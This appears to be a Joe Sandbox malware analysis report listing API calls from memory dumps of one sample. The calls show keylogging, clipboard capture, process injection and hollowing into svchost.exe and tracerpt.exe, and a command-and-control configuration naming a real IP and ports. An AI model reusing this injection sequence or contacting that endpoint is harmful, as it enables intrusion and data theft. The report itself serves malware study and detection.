                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0362DF10,00000000,00000000,00000000), ref: 0362E49B
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03631168,?,?,?,?,?,?,03646298,0000000C,03631210,?), ref: 0362E4A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateObjectSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1891408510-0
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C37181
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                              • Part of subcall function 02C37156: __getptd_noexit.LIBCMT ref: 02C3715B
                                                                                                                              • Part of subcall function 02C37156: __freeptd.LIBCMT ref: 02C37165
                                                                                                                              • Part of subcall function 02C37156: ExitThread.KERNEL32 ref: 02C3716E
                                                                                                                            • __XcptFilter.LIBCMT ref: 02C371A2
                                                                                                                              • Part of subcall function 02C39C41: __getptd_noexit.LIBCMT ref: 02C39C47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 418257734-0
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0362F98F
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                              • Part of subcall function 0362F964: __getptd_noexit.LIBCMT ref: 0362F969
                                                                                                                              • Part of subcall function 0362F964: __freeptd.LIBCMT ref: 0362F973
                                                                                                                              • Part of subcall function 0362F964: ExitThread.KERNEL32 ref: 0362F97C
                                                                                                                            • __XcptFilter.LIBCMT ref: 0362F9B0
                                                                                                                              • Part of subcall function 0363418F: __getptd_noexit.LIBCMT ref: 03634195
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 418257734-0
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0363641B
                                                                                                                              • Part of subcall function 03638E5B: __mtinitlocknum.LIBCMT ref: 03638E71
                                                                                                                              • Part of subcall function 03638E5B: __amsg_exit.LIBCMT ref: 03638E7D
                                                                                                                              • Part of subcall function 03638E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03633F06,0000000D,03646340,00000008,03633FFF,00000000,?,036310F0,00000000,03646278,00000008,03631155,?), ref: 03638E85
                                                                                                                            • __tzset_nolock.LIBCMT ref: 0363642C
                                                                                                                              • Part of subcall function 03635D22: __lock.LIBCMT ref: 03635D44
                                                                                                                              • Part of subcall function 03635D22: ____lc_codepage_func.LIBCMT ref: 03635D8B
                                                                                                                              • Part of subcall function 03635D22: __getenv_helper_nolock.LIBCMT ref: 03635DAD
                                                                                                                              • Part of subcall function 03635D22: _free.LIBCMT ref: 03635DE4
                                                                                                                              • Part of subcall function 03635D22: _strlen.LIBCMT ref: 03635DEB
                                                                                                                              • Part of subcall function 03635D22: __malloc_crt.LIBCMT ref: 03635DF2
                                                                                                                              • Part of subcall function 03635D22: _strlen.LIBCMT ref: 03635E08
                                                                                                                              • Part of subcall function 03635D22: _strcpy_s.LIBCMT ref: 03635E16
                                                                                                                              • Part of subcall function 03635D22: __invoke_watson.LIBCMT ref: 03635E2B
                                                                                                                              • Part of subcall function 03635D22: _free.LIBCMT ref: 03635E3A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1828324828-0
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 02C34755
                                                                                                                              • Part of subcall function 02C33260: __wcsrev.LIBCMT ref: 02C50655
                                                                                                                            Strings
                                                                                                                            • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 02C34750
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsrevlstrlen
                                                                                                                            • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                            • API String ID: 4062721203-291094236
                                                                                                                            APIs
                                                                                                                            • RegCloseKey.ADVAPI32(80000001,03626E9A), ref: 03626EC9
                                                                                                                            • RegCloseKey.ADVAPI32(75BF73E0), ref: 03626ED2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3660427363-0
                                                                                                                            • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                            • Instruction ID: 9fa30df058d8d89981ad1c0164ff269d24df4988365f3a6339d3aeff2b6c14df
                                                                                                                            • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                            • Instruction Fuzzy Hash: E6C08C20C4CB9CE5C03258531D09A7BB2E04B88225F1008FFE80B3AC80ACF52680C6EA
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 02C50693
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 640a7b4604415ed3fcada077ca00375e9fa599d6961303afc37a4510ecb50558
                                                                                                                            • Instruction ID: 1fa2e6ab13cc23dfd6c610c1602a26604dc4335b6215505eb9e1104b1c59c231
                                                                                                                            • Opcode Fuzzy Hash: 640a7b4604415ed3fcada077ca00375e9fa599d6961303afc37a4510ecb50558
                                                                                                                            • Instruction Fuzzy Hash: 4CC04C1868C224E9F53515432D06B2626443B6AF25F604B27FA23AD8C24D904480C597
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C4FAB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: 7b24d334fcacd171fe89243346abc0b33ea11820977dd458f62347b5ddacf395
                                                                                                                            • Instruction ID: ff9d8ef87417f517c434e6068654fb077f3c9c8ee036649d144d6bdf751ec3a9
                                                                                                                            • Opcode Fuzzy Hash: 7b24d334fcacd171fe89243346abc0b33ea11820977dd458f62347b5ddacf395
                                                                                                                            • Instruction Fuzzy Hash: 2DD012B8504500CBD310AB51C48470BB2E2BF84304F20CA19C85E92E10CB38E841CA91
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2809346765-0
                                                                                                                            • Opcode ID: e02f8fa062b9588f9a30bfaac54f852412cf425d1d9617c7b0869e55d23016a8
                                                                                                                            • Instruction ID: 0582bb437fd15e7f06b59d407bc460fd42906c1bc1feec2dbfce1d1b5ce5bd50
                                                                                                                            • Opcode Fuzzy Hash: e02f8fa062b9588f9a30bfaac54f852412cf425d1d9617c7b0869e55d23016a8
                                                                                                                            • Instruction Fuzzy Hash: C590022C7C4101AB5210092269487573694551468134419189803C0400DA108250D554
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32 ref: 02C35EB2
                                                                                                                              • Part of subcall function 02C36F17: _malloc.LIBCMT ref: 02C36F31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 617756273-0
                                                                                                                            • Opcode ID: f2eeb3c9a3c3a51a412f6f5aad4c1f2799a66fa5bebb21c937ec46e7c38a63cd
                                                                                                                            • Instruction ID: ae9cf8a38fff406693659b1cbf2d42371831119d34b79f1c4385950f5bd1e1bf
                                                                                                                            • Opcode Fuzzy Hash: f2eeb3c9a3c3a51a412f6f5aad4c1f2799a66fa5bebb21c937ec46e7c38a63cd
                                                                                                                            • Instruction Fuzzy Hash: C0D022A2D04202DBE7A02EA104C863F61A22794384FA4853DCA0BC2800DE6A5E54CBD2
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362E8A9
                                                                                                                            • Sleep.KERNEL32(00000001,?,?,?,0362604D), ref: 0362E8B3
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362E8BF
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362E8D2
                                                                                                                            • InterlockedExchange.KERNEL32(03651F08,00000000), ref: 0362E8DA
                                                                                                                            • OpenClipboard.USER32(00000000), ref: 0362E8E2
                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0362E8EA
                                                                                                                            • GlobalSize.KERNEL32(00000000), ref: 0362E8FB
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0362E90C
                                                                                                                            • wsprintfW.USER32 ref: 0362E985
                                                                                                                            • _memset.LIBCMT ref: 0362E9A3
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0362E9AC
                                                                                                                            • CloseClipboard.USER32 ref: 0362E9B2
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0362E9CA
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0362E9E4
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362EA02
                                                                                                                            • lstrlenW.KERNEL32(03645B48,?,00000000), ref: 0362EA16
                                                                                                                            • WriteFile.KERNEL32(00000000,03645B48,00000000), ref: 0362EA25
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362EA2C
                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0362EA38
                                                                                                                            • GetKeyState.USER32(00000014), ref: 0362EABC
                                                                                                                            • lstrlenW.KERNEL32(0364B4A8), ref: 0362EB0B
                                                                                                                            • wsprintfW.USER32 ref: 0362EB1D
                                                                                                                            • lstrlenW.KERNEL32(0364B4D0), ref: 0362EB3E
                                                                                                                            • lstrlenW.KERNEL32(0364B4D0), ref: 0362EB61
                                                                                                                            • wsprintfW.USER32 ref: 0362EB7F
                                                                                                                            • wsprintfW.USER32 ref: 0362EB95
                                                                                                                            • wsprintfW.USER32 ref: 0362EBBF
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0362EC0B
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0362EC21
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0362EC3B
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362EC59
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0362EC69
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0362EC74
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362EC7B
                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0362EC88
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                            • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                            • API String ID: 1637302245-2373594894
                                                                                                                            • Opcode ID: 5e0dfcae186ac3a25b9bf0086d27fe3900f2549e0591a75615e7f9819c0331f9
                                                                                                                            • Instruction ID: 7cba60f5a7126939042cbc3ca577609c0528c72a2a59f950b89a705659d7d5fb
                                                                                                                            • Opcode Fuzzy Hash: 5e0dfcae186ac3a25b9bf0086d27fe3900f2549e0591a75615e7f9819c0331f9
                                                                                                                            • Instruction Fuzzy Hash: C9C12278A00711AFD724EF64DD48FAA7BB8BB09700F154A68F25AC7288D7B19580CF64
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 03627804
                                                                                                                            • _memset.LIBCMT ref: 03627850
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03627864
                                                                                                                              • Part of subcall function 03628720: _vswprintf_s.LIBCMT ref: 03628731
                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627893
                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 036278DA
                                                                                                                              • Part of subcall function 03627740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,036278FC), ref: 03627756
                                                                                                                              • Part of subcall function 03627740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,036278FC,?,?,?,?,?,?,74DF0630), ref: 0362775D
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362790A
                                                                                                                            • _memset.LIBCMT ref: 03627923
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362793B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627944
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627956
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627959
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362796B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0362796E
                                                                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627980
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 03627983
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0362798B
                                                                                                                            • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627992
                                                                                                                            • _memset.LIBCMT ref: 036279B4
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 036279CA
                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 036279FF
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03627A1B
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03627A43
                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03627A58
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,036276F0,00001000,00000000), ref: 03627A72
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03627A90
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03627AA1
                                                                                                                            • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03627ABA
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03627AD6
                                                                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03627AE8
                                                                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03627AF1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                            • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                            • API String ID: 4176418925-3213446972
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 02C35849
                                                                                                                            • _memset.LIBCMT ref: 02C35868
                                                                                                                            • _memset.LIBCMT ref: 02C3589D
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02C358B1
                                                                                                                              • Part of subcall function 02C359E0: _vswprintf_s.LIBCMT ref: 02C359F1
                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C358E0
                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02C35928
                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C3594E
                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C35968
                                                                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C35987
                                                                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C359A2
                                                                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C359C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                            • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                            • API String ID: 2170139861-1986163084
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 03627E73
                                                                                                                            • _memset.LIBCMT ref: 03627E9F
                                                                                                                            • _memset.LIBCMT ref: 03627ED4
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03627EE8
                                                                                                                              • Part of subcall function 03628720: _vswprintf_s.LIBCMT ref: 03628731
                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 03627F15
